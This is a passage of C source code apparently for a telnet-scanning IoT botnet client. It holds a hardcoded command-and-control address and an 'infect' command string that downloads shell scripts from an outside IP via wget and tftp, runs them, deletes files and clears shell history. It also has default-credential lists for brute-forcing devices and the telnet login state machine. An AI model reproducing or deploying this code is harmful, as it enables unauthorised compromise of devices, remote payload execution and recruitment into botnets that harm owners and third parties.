  779. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  780. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.27 Safari/536.11",
  781. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.3; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; AskTbCFTP2V5/5.14.1.20007)",
  782. "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  783. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0",
  784. "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.3",
  785. "Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SCH-I535 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile",
  786. "Mozilla/5.0 (iPad; CPU OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E234 Safari/601.1",
  787. "Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LPB23.13-58) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile",
  788. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.3",
  789. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1; 360Spider(compatible; Ha",
  790. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60",
  791. "Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  792. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/536.8+ (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3",
  793. "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25",
  794. "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)",
  795. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
  796. "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)",
  797. "Mozilla/5.0 (Admin Catalog; Windows NT 5.1; infobot.4942@yahoo.com)",
  798. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  799. "HuaweiSymantecSpider/1.0+DSE-support@huaweisymantec.com+(compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR ; http://www.huaweisymantec.com/en/IRL/spider)",
  800. "Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620",
  801. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  802. "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=9422214874901413839)",
  803. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  804. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:24.0) Gecko/20100101 Firefox/24.0",
  805. "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)",
  806. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  807. "Mozilla/5.0 (iPad; U; CPU OS 5_1 like Mac OS X) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10 UCBrowser/3.4.3.532",
  808. "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
  809. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1a2pre) Gecko/2008073000 Shredder/3.0a2pre ThunderBrowse/3.2.1.8",
  810. "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.10) Gecko/20050716 Thunderbird/1.0.6",
  811. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7pre) Gecko/20100925 Firefox/4.0b7pre",
  812. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5pre) Gecko/2008032619 Linpus/3.0-0.49.3.0b5pre.lp Minefield/3.0b5pre",
  813. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.3a1pre) Gecko/20100128 Minefield/3.7a1pre",
  814. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a9pre) Gecko/2007100205 Minefield/3.0a9pre",
  815. "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9a4pre) Gecko/20070402 Minefield/3.0a4pre",
  816. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041103 Firefox/1.0RC2",
  817. "Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0",
  818. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  819. "Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)",
  820. "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0",
  821. "Mozilla/5.0 (Linux; Android 4.2.2; AFTB Build/JDQ39) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.173 Mobile Safari/537.22",
  822. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101230 Mandriva Linux/1.9.2.13-0.2mdv2010.2 (2010.2) Firefox/3.6.13",
  823. "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
  824. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
  825. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  826. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.27 Safari/536.11",
  827. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.3; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; AskTbCFTP2V5/5.14.1.20007)",
  828. "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  829. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0",
  830. "Mozilla/5.0 (PLAYSTATION 3 4.66) AppleWebKit/531.22.8 (KHTML, like Gecko)",
  831. "Wget/1.12 (linux-gnu)",
  832. "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
  833. "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
  834. "Mozilla/5.0 (Nintendo WiiU) AppleWebKit/536.30 (KHTML, like Gecko) NX/3.0.4.2.12 NintendoBrowser/4.3.1.11264.US",
  835. "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.3",
  836. "Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SCH-I535 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile",
  837. "Mozilla/5.0 (iPad; CPU OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E234 Safari/601.1",
  838. "Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LPB23.13-58) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile",
  839. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.3",
  840. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1; 360Spider(compatible; Ha",
  841. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60",
  842. "Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  843. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/536.8+ (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3",
  844. "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25",
  845. "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)",
  846. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  847. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
  848. "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)",
  849. "Mozilla/5.0 (Admin Catalog; Windows NT 5.1; infobot.4942@yahoo.com)",
  850. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  851. "HuaweiSymantecSpider/1.0+DSE-support@huaweisymantec.com+(compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR ; http://www.huaweisymantec.com/en/IRL/spider)",
  852. "Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620",
  853. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  854. "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=9422214874901413839)",
  855. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"
  856. };
  857.  
  858. //IP
  859. unsigned char *LegacyServer[] = { "45.76.58.62:4400" };
  860. //WGET
  861. char *infect = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.76.182.202/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.76.182.202 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.76.182.202; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *;history -c\r\n";
  862. //USER/PASS
  863. char *usernames[] = {"telnet\0", "root\0", "root\0", "root\0", "root\0", "root\0", "default\0", "daemon\0", "support\0"};
  864. char *passwords[] = {"telnet\0", "root\0", "\0", "123456\0", "Zte521\0", "vizxv\0", "default\0", "\0", "support\0"};
  865. //SHIT
  866. int initConnection();
  867. void makeRandomStr(unsigned char *buf, int length);
  868. int Heliosprintf(int sock, char *formatStr, ...);
  869. char *inet_ntoa(struct in_addr in);
  870. int HeliosCommSock = 0, currentServer = -1, gotIP = 0;
  871. uint32_t *pids;
  872. uint32_t scanPid;
  873. uint64_t numpids = 0;
  874. struct in_addr ourIP;
  875. struct in_addr ourPublicIP;
  876. unsigned char macAddress[6] = {0};
  877. char *tmpdirs[] = {"/dev/netslink/", "/tmp/", "/var/", "/dev/", "/var/run/", "/dev/shm/", "/mnt/", "/boot/", "/usr/", "/opt/", (char*)0};
  878. char *advances[] = {":", "ogin", "sername", "assword", (char*)0};
  879. char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
  880. char *successes[] = {"busybox", "$", "#", (char*)0};
  881. char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
  882. static uint32_t Q[4096], c = 362436;
  883. void init_rand(uint32_t x) {
  884. int i;
  885. Q[0] = x;
  886. Q[1] = x + PHI;
  887. Q[2] = x + PHI + PHI;
  888. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
  889. }
  890. uint32_t rand_cmwc(void) {
  891. uint64_t t, a = 18782LL;
  892. static uint32_t i = 4095;
  893. uint32_t x, r = 0xfffffffe;
  894. i = (i + 1) & 4095;
  895. t = a * Q[i] + c;
  896. c = (uint32_t)(t >> 32);
  897. x = t + c;
  898. if (x < c) {
  899. x++;
  900. c++;
  901. }
  902. return (Q[i] = r - x);
  903. }
  904. void trim(char *str) {
  905. int i;
  906. int begin = 0;
  907. int end = strlen(str) - 1;
  908. while (isspace(str[begin])) begin++;
  909. while ((end >= begin) && isspace(str[end])) end--;
  910. for (i = begin; i <= end; i++) str[i - begin] = str[i];
  911. str[i - begin] = '\0';
  912. }
  913. static void printchar(unsigned char **str, int c) {
  914. if (str) {
  915. **str = c;
  916. ++(*str);
  917. }
  918. else (void)write(1, &c, 1);
  919. }
  920. static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {
  921. register int pc = 0, padchar = ' ';
  922. if (width > 0) {
  923. register int len = 0;
  924. register const unsigned char *ptr;
  925. for (ptr = string; *ptr; ++ptr) ++len;
  926. if (len >= width) width = 0;
  927. else width -= len;
  928. if (pad & PAD_ZERO) padchar = '0';
  929. }
  930. if (!(pad & PAD_RIGHT)) {
  931. for ( ; width > 0; --width) {
  932. printchar (out, padchar);
  933. ++pc;
  934. }
  935. }
  936. for ( ; *string ; ++string) {
  937. printchar (out, *string);
  938. ++pc;
  939. }
  940. for ( ; width > 0; --width) {
  941. printchar (out, padchar);
  942. ++pc;
  943. }
  944. return pc;
  945. }
  946. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {
  947. unsigned char print_buf[PRINT_BUF_LEN];
  948. register unsigned char *s;
  949. register int t, neg = 0, pc = 0;
  950. register unsigned int u = i;
  951. if (i == 0) {
  952. print_buf[0] = '0';
  953. print_buf[1] = '\0';
  954. return prints (out, print_buf, width, pad);
  955. }
  956. if (sg && b == 10 && i < 0) {
  957. neg = 1;
  958. u = -i;
  959. }
  960. s = print_buf + PRINT_BUF_LEN-1;
  961. *s = '\0';
  962. while (u) {
  963. t = u % b;
  964. if( t >= 10 )
  965. t += letbase - '0' - 10;
  966. *--s = t + '0';
  967. u /= b;
  968. }
  969. if (neg) {
  970. if( width && (pad & PAD_ZERO) ) {
  971. printchar (out, '-');
  972. ++pc;
  973. --width;
  974. }
  975. else {
  976. *--s = '-';
  977. }
  978. }
  979. return pc + prints (out, s, width, pad);
  980. }
  981. static int print(unsigned char **out, const unsigned char *format, va_list args ) {
  982. register int width, pad;
  983. register int pc = 0;
  984. unsigned char scr[2];
  985. for (; *format != 0; ++format) {
  986. if (*format == '%') {
  987. ++format;
  988. width = pad = 0;
  989. if (*format == '\0') break;
  990. if (*format == '%') goto out;
  991. if (*format == '-') {
  992. ++format;
  993. pad = PAD_RIGHT;
  994. }
  995. while (*format == '0') {
  996. ++format;
  997. pad |= PAD_ZERO;
  998. }
  999. for ( ; *format >= '0' && *format <= '9'; ++format) {
  1000. width *= 10;
  1001. width += *format - '0';
  1002. }
  1003. if( *format == 's' ) {
  1004. register char *s = (char *)va_arg( args, int );
  1005. pc += prints (out, s?s:"(null)", width, pad);
  1006. continue;
  1007. }
  1008. if( *format == 'd' ) {
  1009. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
  1010. continue;
  1011. }
  1012. if( *format == 'x' ) {
  1013. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
  1014. continue;
  1015. }
  1016. if( *format == 'X' ) {
  1017. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
  1018. continue;
  1019. }
  1020. if( *format == 'u' ) {
  1021. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
  1022. continue;
  1023. }
  1024. if( *format == 'c' ) {
  1025. scr[0] = (unsigned char)va_arg( args, int );
  1026. scr[1] = '\0';
  1027. pc += prints (out, scr, width, pad);
  1028. continue;
  1029. }
  1030. } else {
  1031. out:
  1032. printchar (out, *format);
  1033. ++pc;
  1034. }
  1035. }
  1036. if (out) **out = '\0';
  1037. va_end( args );
  1038. return pc;
  1039. }
  1040. int zprintf(const unsigned char *format, ...) {
  1041. va_list args;
  1042. va_start( args, format );
  1043. return print( 0, format, args );
  1044. }
  1045. int szprintf(unsigned char *out, const unsigned char *format, ...) {
  1046. va_list args;
  1047. va_start( args, format );
  1048. return print( &out, format, args );
  1049. }
  1050. int Heliosprintf(int sock, char *formatStr, ...) {
  1051. unsigned char *textBuffer = malloc(2048);
  1052. memset(textBuffer, 0, 2048);
  1053. char *orig = textBuffer;
  1054. va_list args;
  1055. va_start(args, formatStr);
  1056. print(&textBuffer, formatStr, args);
  1057. va_end(args);
  1058. orig[strlen(orig)] = '\n';
  1059. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
  1060. free(orig);
  1061. return q;
  1062. }
  1063. static int *fdopen_pids;
  1064. int fdpopen(unsigned char *program, register unsigned char *type) {
  1065. register int iop;
  1066. int pdes[2], fds, pid;
  1067. if (*type != 'r' && *type != 'w' || type[1]) return -1;
  1068. if (pipe(pdes) < 0) return -1;
  1069. if (fdopen_pids == NULL) {
  1070. if ((fds = getdtablesize()) <= 0) return -1;
  1071. if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;
  1072. memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));
  1073. }
  1074. switch (pid = vfork()) {
  1075. case -1:
  1076. close(pdes[0]);
  1077. close(pdes[1]);
  1078. return -1;
  1079. case 0:
  1080. if (*type == 'r') {
  1081. if (pdes[1] != 1) {
  1082. dup2(pdes[1], 1);
  1083. close(pdes[1]);
  1084. }
  1085. close(pdes[0]);
  1086. } else {
  1087. if (pdes[0] != 0) {
  1088. (void) dup2(pdes[0], 0);
  1089. (void) close(pdes[0]);
  1090. }
  1091. (void) close(pdes[1]);
  1092. }
  1093. execl("/bin/sh", "sh", "-c", program, NULL);
  1094. _exit(127);
  1095. }
  1096. if (*type == 'r') {
  1097. iop = pdes[0];
  1098. (void) close(pdes[1]);
  1099. } else {
  1100. iop = pdes[1];
  1101. (void) close(pdes[0]);
  1102. }
  1103. fdopen_pids[iop] = pid;
  1104. return (iop);
  1105. }
  1106. int fdpclose(int iop) {
  1107. register int fdes;
  1108. sigset_t omask, nmask;
  1109. int pstat;
  1110. register int pid;
  1111. if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);
  1112. (void) close(iop);
  1113. sigemptyset(&nmask);
  1114. sigaddset(&nmask, SIGINT);
  1115. sigaddset(&nmask, SIGQUIT);
  1116. sigaddset(&nmask, SIGHUP);
  1117. (void) sigprocmask(SIG_BLOCK, &nmask, &omask);
  1118. do {
  1119. pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);
  1120. } while (pid == -1 && errno == EINTR);
  1121. (void) sigprocmask(SIG_SETMASK, &omask, NULL);
  1122. fdopen_pids[fdes] = 0;
  1123. return (pid == -1 ? -1 : WEXITSTATUS(pstat));
  1124. }
  1125. unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd) {
  1126. int got = 1, total = 0;
  1127. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
  1128. return got == 0 ? NULL : buffer;
  1129. }
  1130. static const long hextable[] = {
  1131. [0 ... 255] = -1,
  1132. ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
  1133. ['A'] = 10, 11, 12, 13, 14, 15,
  1134. ['a'] = 10, 11, 12, 13, 14, 15
  1135. };
  1136. long parseHex(unsigned char *hex) {
  1137. long ret = 0;
  1138. while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];
  1139. return ret;
  1140. }
  1141. int wildString(const unsigned char* pattern, const unsigned char* string) {
  1142. switch(*pattern) {
  1143. case '\0': return *string;
  1144. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
  1145. case '?': return !(*string && !wildString(pattern+1, string+1));
  1146. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
  1147. }
  1148. }
  1149. int getHost(unsigned char *toGet, struct in_addr *i) {
  1150. struct hostent *h;
  1151. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
  1152. return 0;
  1153. }
  1154. void uppercase(unsigned char *str) {
  1155. while(*str) { *str = toupper(*str); str++; }
  1156. }
  1157. void makeRandomStr(unsigned char *buf, int length) {
  1158. int i = 0;
  1159. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
  1160. }
  1161. int recvLine(int socket, unsigned char *buf, int bufsize) {
  1162. memset(buf, 0, bufsize);
  1163. fd_set myset;
  1164. struct timeval tv;
  1165. tv.tv_sec = 30;
  1166. tv.tv_usec = 0;
  1167. FD_ZERO(&myset);
  1168. FD_SET(socket, &myset);
  1169. int selectRtn, retryCount;
  1170. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
  1171. while(retryCount < 10) {
  1172. #ifdef PRINTS_ENABLED
  1173. Heliosprintf(HeliosCommSock, "PING");
  1174. #endif
  1175. tv.tv_sec = 30;
  1176. tv.tv_usec = 0;
  1177. FD_ZERO(&myset);
  1178. FD_SET(socket, &myset);
  1179. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
  1180. retryCount++;
  1181. continue;
  1182. }
  1183. break;
  1184. }
  1185. }
  1186. unsigned char tmpchr;
  1187. unsigned char *cp;
  1188. int count = 0;
  1189. cp = buf;
  1190. while(bufsize-- > 1) {
  1191. if(recv(HeliosCommSock, &tmpchr, 1, 0) != 1) {
  1192. *cp = 0x00;
  1193. return -1;
  1194. }
  1195. *cp++ = tmpchr;
  1196. if(tmpchr == '\n') break;
  1197. count++;
  1198. }
  1199. *cp = 0x00;
  1200. // zprintf("recv: %s\n", cp);
  1201. return count;
  1202. }
  1203. struct telstate_t {
  1204. int fd;
  1205. unsigned int ip;
  1206. unsigned char state;
  1207. unsigned char complete;
  1208. unsigned char usernameInd;
  1209. unsigned char passwordInd;
  1210. unsigned char tempDirInd;
  1211. unsigned int totalTimeout;
  1212. unsigned short bufUsed;
  1213. char *sockbuf;
  1214. };
  1215. const char* get_telstate_host(struct telstate_t* telstate) {
  1216. struct in_addr in_addr_ip;
  1217. in_addr_ip.s_addr = telstate->ip;
  1218. return inet_ntoa(in_addr_ip);
  1219. }
  1220. int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) {
  1221. int num_bytes, i;
  1222. memset(buffer, 0, buf_size);
  1223. num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
  1224. if(buffer[0] == 0xFF) {
  1225. negotiate(fd, buffer, 3);
  1226. }
  1227. if(contains_string(buffer, strings)) {
  1228. return 1;
  1229. }
  1230. return 0;
  1231. }
  1232. int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) {
  1233. fd_set read_set;
  1234. struct timeval tv;
  1235. tv.tv_sec = 0;
  1236. tv.tv_usec = timeout_usec;
  1237. FD_ZERO(&read_set);
  1238. FD_SET(fd, &read_set);
  1239. if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
  1240. return 0;
  1241. return recv(fd, buffer, buf_size, 0);
  1242. }
  1243. void advance_state(struct telstate_t* telstate, int new_state) {
  1244. if(new_state == 0) {
  1245. close(telstate->fd);
  1246. }
  1247. telstate->totalTimeout = 0;
  1248. telstate->state = new_state;
  1249. memset((telstate->sockbuf), 0, BUFFER_SIZE);
  1250. }
  1251. void reset_telstate(struct telstate_t* telstate) {
  1252. advance_state(telstate, 0);
  1253. telstate->complete = 1;
  1254. }
  1255. int contains_success(char* buffer) {
  1256. return contains_string(buffer, successes);
  1257. }
  1258. int contains_fail(char* buffer) {
  1259. return contains_string(buffer, fails);
  1260. }
  1261. int contains_response(char* buffer) {
  1262. return contains_success(buffer) || contains_fail(buffer);
  1263. }
  1264. int contains_string(char* buffer, char** strings) {
  1265. int num_strings = 0, i = 0;
  1266. for(num_strings = 0; strings[++num_strings] != 0; );
  1267. for(i = 0; i < num_strings; i++) {
  1268. if(strcasestr(buffer, strings[i])) {
  1269. return 1;
  1270. }
  1271. }
  1272. return 0;
  1273. }
  1274. int connectTimeout(int fd, char *host, int port, int timeout) {
  1275. struct sockaddr_in dest_addr;
  1276. fd_set myset;
  1277. struct timeval tv;
  1278. socklen_t lon;
  1279. int valopt;
  1280. long arg = fcntl(fd, F_GETFL, NULL);
  1281. arg |= O_NONBLOCK;
  1282. fcntl(fd, F_SETFL, arg);
  1283. dest_addr.sin_family = AF_INET;
  1284. dest_addr.sin_port = htons(port);
  1285. if(getHost(host, &dest_addr.sin_addr)) return 0;
  1286. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1287. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  1288. if (res < 0) {
  1289. if (errno == EINPROGRESS) {
  1290. tv.tv_sec = timeout;
  1291. tv.tv_usec = 0;
  1292. FD_ZERO(&myset);
  1293. FD_SET(fd, &myset);
  1294. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
  1295. lon = sizeof(int);
  1296. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  1297. if (valopt) return 0;
  1298. }
  1299. else return 0;
  1300. }
  1301. else return 0;
  1302. }
  1303. arg = fcntl(fd, F_GETFL, NULL);
  1304. arg &= (~O_NONBLOCK);
  1305. fcntl(fd, F_SETFL, arg);
  1306. return 1;
  1307. }
  1308. int listFork() {
  1309. uint32_t parent, *newpids, i;
  1310. parent = fork();
  1311. if (parent <= 0) return parent;
  1312. numpids++;
  1313. newpids = (uint32_t*)malloc((numpids + 1) * 4);
  1314. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
  1315. newpids[numpids - 1] = parent;
  1316. free(pids);
  1317. pids = newpids;
  1318. return parent;
  1319. }
  1320. int negotiate(int sock, unsigned char *buf, int len) {
  1321. unsigned char c;
  1322. switch (buf[1]) {
  1323. case CMD_IAC: /*dropped an extra 0xFF wh00ps*/ return 0;
  1324. case CMD_WILL:
  1325. case CMD_WONT:
  1326. case CMD_DO:
  1327. case CMD_DONT:
  1328. c = CMD_IAC;
  1329. send(sock, &c, 1, MSG_NOSIGNAL);
  1330. if (CMD_WONT == buf[1]) c = CMD_DONT;
  1331. else if (CMD_DONT == buf[1]) c = CMD_WONT;
  1332. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
  1333. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
  1334. send(sock, &c, 1, MSG_NOSIGNAL);
  1335. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
  1336. break;
  1337. default:
  1338. break;
  1339. }
  1340. return 0;
  1341. }
  1342. int matchPrompt(char *bufStr) {
  1343. char *prompts = ":>%$#\0";
  1344. int bufLen = strlen(bufStr);
  1345. int i, q = 0;
  1346. for(i = 0; i < strlen(prompts); i++) {
  1347. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
  1348. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
  1349. }
  1350. return 0;
  1351. }
  1352. int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex) {
  1353. int bufferUsed = initialIndex, got = 0, found = 0;
  1354. fd_set myset;
  1355. struct timeval tv;
  1356. tv.tv_sec = timeout;
  1357. tv.tv_usec = timeoutusec;
  1358. unsigned char *initialRead = NULL;
  1359. while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0)) {
  1360. FD_ZERO(&myset);
  1361. FD_SET(fd, &myset);
  1362. if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
  1363. initialRead = buffer + bufferUsed;
  1364. got = recv(fd, initialRead, 1, 0);
  1365. if(got == -1 || got == 0) return 0;
  1366. bufferUsed += got;
  1367. if(*initialRead == 0xFF) {
  1368. got = recv(fd, initialRead + 1, 2, 0);
  1369. if(got == -1 || got == 0) return 0;
  1370. bufferUsed += got;
  1371. if(!negotiate(fd, initialRead, 3)) return 0;
  1372. } else {
